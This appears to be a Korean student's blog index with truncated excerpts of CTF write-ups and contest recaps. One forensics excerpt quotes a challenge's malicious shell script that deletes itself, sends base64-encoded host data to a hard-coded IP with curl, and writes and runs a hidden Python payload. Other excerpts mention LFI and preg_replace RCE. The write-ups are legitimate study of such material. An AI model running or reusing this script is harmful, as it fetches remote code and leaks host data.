LittleDev

보호되어 있는 글입니다.

올해 처음 열린 대회라 기대했고 본선도 가보면 좋겠다 싶었는데 아쉽게 못 갔다.. ㅎㅎ Pwn - babystack2022 이 문제를 오랫동안 봤고 Web 문제들은 Kunclen LFI까지 성공한 후 풀지 못하였다. 대회 시간은 위와같이 토요일 오전 9시부터 일요일 오후 9시까지 진행되었다. 원래 토요일날 고급물리학 수행보러 가기로했었는데 쌤이 기말끝나고로 미뤄주셨다. 먼저 babystack2022은 입력부터 지금까지 풀어온 문제들과 달랐다. #!/bin/bash -e CONN_ENV="$(mktemp -d -t challenv-XXXXXXXXXX)" FILE_NAME="exploit.md2" cd `dirname "$0"` trap 'rm -rf -- "$CONN_ENV"' EXIT echo "Give..

인생 첫 코게이자 마지막 학생부 코게 예선 결과는 9위 토요일 19시부터 일요일 19시까지 24시간인데, 토욜날 문제 분석하다가 냅다 자버렸다. 일욜 느긋하게 문제 맛이나 볼까 하다 생각보다 문제가 풀리니까 중후반부터는 열심히 했던 것 같다. 포너블 2문제 난이도가 그렇게 어렵지 않았는데 다른사람들 풀때 못풀었다. consukey 풀고 malware 천점짜리 문제 도전하다 못풀었다. 훼이크에 제대로 걸려서 2시간이 날라가고 나머지 한시간 정적분석하다 끝내 못했다. 생각 외로 내가 성장한건지 문제 난이도가 전체적으로 나쁘지 않았던 것 같다. 보통 이런 큰 대회면 손 못대는 문제가 꽤 많았는데, 이정도면 나쁘지 않다 생각한다. 본선에 가서 10위 안에 드는 걸 목표로 해봐야겠다. 1. maldoc 문서파일을..

선린인터넷고 Layer7에서 11/20 오전 9시부터 밤 12시까지 대회를 진행하였다. 작년엔 고등부 3위를 했었는데, 올해는 2위를 하게 되었다. 아침 9시에 학교에서 모임이 있어서 학교에서 웹 하나 풀고 1시에 집가서 대회를 진행하였다. 수상만 하자라는 생각이었는데 생각보다 오랜 시간 1등을 차지해서 괜히 욕심났지만 결ㄹ국 11시 반쯤 2위가 되었따. 요약하면 Easy_Rev (Rev) 문제랑 PocketMon (Pwn) 문제가 솔버가 많았는데 못 풀어서 1등을 못 했다. 그 대신 2솔버 문제 Time is Ticking... 을 풀었는데, 이 문제가 가장 재밌었던 것 같다. 작년에는 포너블 리버싱 VM문제를 재밌게 풀었는데, 올해는 리버싱 문제를 재밌게 풀었다. 또 웹 문제들도 재밌게 풀었다. 1...

pcap 파일과 쉘스크립트 파일 하나를 준다. #!/bin/bash rm -f "${BASH_SOURCE[0]}" which python3 >/dev/null if [[ $? -ne 0 ]]; then exit fi which curl >/dev/null if [[ $? -ne 0 ]]; then exit fi mac_addr=$(ip addr | grep 'state UP' -A1 | tail -n1 | awk '{print $2}') curl 54.80.43.46/images/banner.png?cache=$(base64 /tmp/.cacheimg python3 /tmp/.cacheimg rm -f /tmp/.cacheimg 54.80.43.46 패킷을 봐야겠따. ip.src == 54.80.43.4..

0. Sanity check FLAG : INCO{Inc0gntio운영팀화이팅!} 1. MISC 1) EZ_steganography HxD로 열면 끝에 INCO{457a5f53746567} 가 있다. 헥스값을 디코딩하면 Ez_Steg가 나온다. FLAG : INCO{Ez_Steg} 2) hex carving zip 파일이 속에 있다. hxd로 긁어서 꺼내고 압축 풀면 gif 파일이 나온다. gif 의 프레임들을 사이트를 이용해서 뽑아낸다. FLAG : INCO{3Z_C4rving} 3) Deconstructionism 텍스트파일을 주는데, 뒤의 3개는 RGB, 앞의 2개가 XY임을 유추할 수 있다. x는 37, y는 521이 최대임을 알 수 있다. python의 Pillow를 사용하여 픽셀 하나하나를 넣..

http://sc.anu.ac.kr/ ANUSEC | 전국 고등학생 사이버 보안경진대회 ANUSEC은 전국 고등학생 사이버 보안경진대회 입니다. 국제 유명 해킹대회와 같은 CTF 해킹방어대회로 진행됩니다. 지금 참여하세요! sc.anu.ac.kr 아침 10시 ~ 오후 5시 20분까지 대회가 진행되었다. 나는 위 문제들을 풀었고, 몇개는 플래그를 찾았지만 글자 몇개씩 틀려서 친구가 인증해주었다. 1.MIC CHECK ADCTF{Welcome to ADCTF} 2. Question apk 파일을 준다. 해당 파일을 http://www.javadecompilers.com/apk 에서 디컴파일 후 resources/lib/x86_64/libnative-lib.so 파일을 ida로 열고 Shift + F12를 눌..

산지 이틀만 다읽었다. https://youtube.com/c/cmiscm

코드 8문제? 정도 풀었는데 그 중 2개를 쓰겠다. We Need an Emulator MOV DRX "LemonS" XOR TRX DRX MOV DRX "caviar" REVERSE DRX XOR TRX DRX REVERSE TRX MOV DRX "vaniLla" XOR TRX DRX REVERSE TRX XOR TRX DRX REVERSE TRX MOV DRX "tortillas" XOR TRX DRX MOV DRX "applEs" ... 문제에서 TRX값과 MOV, XOR, REVERSE 명령어들의 규칙을 알려준다. TRX에 "GED\x03hG\x15&Ka =;\x0c\x1a31o*5M" 값을 세팅하고 저 명령어들을 실행하면 TRX에 FLAG가 담긴다고 한다. 파이썬으로 구현했다. DRX = [] ..

vuln.live/blog/12 1. .git 이 존재하는 걸 알았지만 어떻게 해야할 지 몰랐다. -> git-dumper로 덤프 뜨고 git log -p 로 로그를 훑어 본 뒤에, git checkout 원하는 커밋 해쉬값 하면 그때로 돌아간다. 참고/twoicefish-secu.tistory.com/106 Github Forensic 문제에 유용한 Git 명령어 1. 로그와 변경사항 보기 git log -p 각 커밋마다 수정된 파일의 내역을 보여준다. 2. 브랜치 변경 git checkout [Commit hash] git checkout commit 해쉬를 입력하고 파일 찾기를 진행하면된다. twoicefish-secu.tistory.com 2. preg_replace RCE로 원하는 함수를 실행 ..